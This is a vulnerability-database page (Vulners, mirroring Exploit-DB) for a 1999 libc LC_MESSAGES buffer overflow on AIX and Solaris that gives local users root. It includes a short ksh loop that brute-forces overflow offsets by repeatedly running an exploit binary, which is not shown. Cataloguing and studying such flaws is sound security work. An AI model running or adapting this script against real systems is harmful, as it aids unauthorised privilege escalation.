IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)
🗓️ 22 May 1999 00:00:00Reported by UNYUN@ShadowPenguinSecurityType
exploitdb🔗 www.exploit-db.com👁 28 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-1999-0767 | 4 Feb 200005:00 | – | cve | |
| CVE-1999-0767 | 4 Feb 200005:00 | – | cvelist | |
| IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (2) | 22 May 199900:00 | – | exploitdb | |
| IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3) | 22 May 199900:00 | – | exploitdb | |
| IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4) | 22 May 199900:00 | – | exploitdb | |
| IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5) | 22 May 199900:00 | – | exploitdb | |
| EUVD-1999-0748 | 7 Oct 202500:30 | – | euvd | |
| CVE-1999-0767 | 8 Sep 199904:00 | – | nvd | |
| PT-1999-1338 · Oracle · Solaris | 8 Sep 199900:00 | – | ptsecurity | |
| CVE-1999-0767 | 21 May 202518:12 | – | redhatcve |
10
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01197